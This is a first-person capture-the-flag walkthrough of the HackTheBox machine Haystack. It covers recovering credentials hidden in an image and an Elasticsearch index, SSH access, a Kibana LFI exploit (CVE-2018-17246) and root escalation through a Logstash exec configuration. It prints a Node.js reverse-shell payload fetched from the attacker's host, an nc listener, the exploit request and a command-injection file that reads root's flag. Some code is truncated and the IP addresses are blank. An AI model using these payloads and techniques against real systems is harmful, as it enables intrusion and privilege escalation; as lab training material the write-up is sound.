HackTheBox: Haystack

The first step, as is almost always the case, is to run an Nmap scan against the host to discover which services are running:

root@kali:~/Documents/haystack# nmap -A -oN scan
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for
Host is up (0.017s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
1   16.13 ms
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

From the output we can see that SSH is running on port 22, with nginx web servers on ports 80 and 9200. Browsing to the page on port 80, you are greeted with a large image of a needle in a haystack. I downloaded this image and ran strings on the file.

root@kali:~/Downloads/haystack# strings needle.jpg

At the bottom of the strings output you can see a long string which appears to be base64 encoded.
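Base64 data tends to stand out in strings output as a long unbroken run of alphanumeric characters, often padded with =. A simple grep can surface such candidates; the filter is shown here against a short sample input (the real strings output of needle.jpg is much longer):

```shell
# Surface base64-looking lines: 20+ base64-alphabet chars, optional '=' padding.
# Against the real image this would be: strings needle.jpg | grep -E '...'
printf 'JFIF\nExif junk\nbGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==\n' \
  | grep -E '^[A-Za-z0-9+/]{20,}={0,2}$'
```

Only the candidate base64 line survives the filter, ready to be piped to base64 -d.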

root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"

This is Spanish for "the needle in the haystack is 'clave'" — clave meaning "key". I then decided to browse to port 9200. It returned some JSON formatted data which indicates that it is hosting an Elasticsearch database:

  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  "tagline" : "You Know, for Search"

I then browsed to the indices listing to view the indices which are in use:


As you can see from the output, there are three indices: .kibana, bank and quotes.
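For reference, this listing comes from Elasticsearch's standard _cat API. The curl line below is the assumed query (target IP omitted), and the sample row is a made-up line in the _cat/indices output format, just to show how an index name can be pulled out:

```shell
# Standard Elasticsearch endpoint for listing indices:
# curl 'http://<target>:9200/_cat/indices?v'
# Data rows have the format: health status index uuid pri rep docs.count ...
sample='yellow open quotes 1Pl0sDeXQdeDzGgnjQLkCw 1 1 253 0 262.7kb 262.7kb'
echo "$sample" | awk '{print $3}'   # third column is the index name
```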

Now the next step I performed in quite a messy way; there is probably a much cleaner way of doing it. I knew from the decoded base64 string in the image that the word of interest is ‘clave’, so I browsed to each index in turn and used CTRL+F to search for the word clave. I found two results in the quotes index, both containing additional base64 strings:

{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}

The quotes translate roughly to "This key cannot be lost, I'll keep it here" and "I have to save the key for the machine". I then decoded the embedded strings using the same method as before.

root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security
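With more than one string to decode, a small loop saves repeating the command (the strings below are the two recovered from the quotes index):

```shell
# Decode each recovered base64 string in turn; the extra echo keeps
# the outputs on separate lines.
for s in 'dXNlcjogc2VjdXJpdHkg' 'cGFzczogc3BhbmlzaC5pcy5rZXk='; do
  echo "$s" | base64 -d; echo
done
```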

So we now have login credentials which allow access to the machine via SSH. From the indices we can also see that Kibana is very likely installed. Once logged in via SSH, I checked the Kibana config file to see how it has been set up.

root@kali:~/Downloads/haystack# ssh security@
security@'s password: 
Last login: Tue Aug  6 15:52:37 2019 from
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: ""

We can see that it is running on port 5601 but is bound only to localhost, so it isn't accessible remotely. After a bit of Googling I found an LFI vulnerability (CVE-2018-17246) in this version of Kibana that we can use to run code as the kibana user.

The first stage in exploiting the vulnerability is to upload a JavaScript reverse shell that can be executed by Kibana. I hosted the following JavaScript file on my Kali machine via Python's SimpleHTTPServer, of course making sure to change the IP address to match my OpenVPN IP.

    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "", function(){
    return /a/; // Prevents the Node.js application form crashing

I then downloaded the file to the haystack machine using curl.

[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl --output jim.js

The next step is to start a netcat listener on the Kali machine to receive the connection from the reverse shell once it runs. This listener needs to be on port 1337, as specified in the JavaScript file.

root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 1337 ...

I then sent the GET request to Kibana, as described on the vulnerability's GitHub page, using curl. The request has to come from localhost as Kibana is only accessible locally.

[security@haystack tmp]$ curl -X GET ''

Looking at the listener, we can see that the connection has been made. Typing ls successfully lists the current directory.

root@kali:~/Downloads# nc -lvp 1337
listening on [any] 1337 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 56236

I upgraded to a more user-friendly bash shell using Python. You can also see from whoami that we are now accessing the machine as the kibana user:

python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami
kibana

We now need to find a process that can be abused in some way to allow privilege escalation to root. Running ps aux lists all running processes, and it is apparent from this that Logstash is running as root.

[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete- org.logstash.Logstash --path.settings /etc/logstash

I took a look at the logstash configuration:

bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
bash-4.2$ cat input.conf
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
bash-4.2$ cat filter.conf
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

You can see that Logstash is configured with three files: input.conf, filter.conf and output.conf.

input.conf shows that it reads data from files matching /opt/kibana/logstash_*, checking for new content every 10 seconds.

filter.conf shows that each message is matched against the pattern Ejecutar comando: <command>, with everything after the colon captured into the field comando.

output.conf shows that the command captured in the dynamic string comando is then executed.
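The grok match can be sanity-checked locally: grep -P understands the same \s regex syntax, and everything after \K corresponds to what %{GREEDYDATA:comando} would capture:

```shell
# Everything after "Ejecutar comando: " is what grok would put into comando:
echo 'Ejecutar comando: whoami' | grep -oP 'Ejecutar\s*comando\s*:\s+\K.*'
# prints: whoami
```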

With this information we now know that we need to provide a file matching /opt/kibana/logstash_* which includes a command we want to run. This command will be executed by Logstash, which in turn is running as root.

Logstash is very new to me, and I wasn't completely sure of the format needed in the log file for a command to be captured by the filter and executed. Because of this I went for the spray-and-pray technique, loading the file with an assortment of possible formats in the hope that at least one would work. The file can be seen here:

comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

I hosted this file on my Kali machine through Python's SimpleHTTPServer and downloaded it to the Haystack machine into the /opt/kibana directory.

bash-4.2$ cd /opt/kibana/

curl --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

I waited the 10 seconds as configured in the input.conf for the file to be processed. I then checked the /tmp directory to see if my file had been created.

bash-4.2$ ls /tmp

As you can see, the good3 file has been created in /tmp. I did try recreating the logstash_j file with just the line which executed, but for some reason it didn't work; I'm still not 100% sure what the format should be. All I know is that what I used worked, even if it is a bit messy. I then ran cat on the file to view the flag and complete the machine.
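Running the sprayed lines back through the same regex locally at least shows why only good3 appeared: just one of the five lines actually matches the grok pattern (grep -P standing in for grok here):

```shell
# Recreate the spray file and count lines matching the filter's pattern.
cat > /tmp/spray <<'EOF'
comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5
EOF
grep -cP 'Ejecutar\s*comando\s*:\s+' /tmp/spray   # prints: 1
grep -nP 'Ejecutar\s*comando\s*:\s+' /tmp/spray   # line 3 is the only match
```

Note that line 5 does not match because the \s* there is a literal string, not whitespace.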

bash-4.2$ cat /tmp/good3
